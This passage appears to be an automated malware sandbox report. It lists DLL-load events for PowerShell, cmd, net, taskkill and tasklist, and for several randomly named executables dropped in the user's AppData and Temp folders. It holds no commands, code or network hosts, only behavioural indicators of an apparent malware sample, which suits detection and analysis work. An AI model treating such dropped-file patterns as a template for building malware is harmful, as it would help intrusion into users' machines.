                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: aclayers.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Windows\SysWOW64\net.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dllJump to behavior
                      Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: aclayers.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dllJump to behavior
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: aclayers.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: aclayers.dll
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dll
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc.dll
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeSection loaded: aclayers.dll
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeSection loaded: mpr.dll
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeSection loaded: sfc.dll
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeSection loaded: sfc_os.dll
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeSection loaded: aclayers.dll
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeSection loaded: mpr.dll
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeSection loaded: sfc.dll
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeSection loaded: sfc_os.dll
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeSection loaded: winhttp.dll
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeSection loaded: webio.dll
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeSection loaded: winnsi.dll
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeSection loaded: rasadhlp.dll
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeSection loaded: fwpuclnt.dll
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeSection loaded: schannel.dll
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeSection loaded: mskeyprotect.dll
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeSection loaded: ntasn1.dll
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeSection loaded: ncrypt.dll
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeSection loaded: ncryptsslp.dll
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeSection loaded: dpapi.dll
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeSection loaded: wbemcomn.dll
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Local\wxymrnibweqciwn.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Local\wxymrnibweqciwn.exeSection loaded: aclayers.dll
                      Source: C:\Users\user\AppData\Local\wxymrnibweqciwn.exeSection loaded: mpr.dll
                      Source: C:\Users\user\AppData\Local\wxymrnibweqciwn.exeSection loaded: sfc.dll
                      Source: C:\Users\user\AppData\Local\wxymrnibweqciwn.exeSection loaded: sfc_os.dll
                      Source: C:\Users\user\AppData\Local\wxymrnibweqciwn.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                      Source: C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exeSection loaded: wininet.dll
                      Source: C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exeSection loaded: ntmarta.dll
                      Source: C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
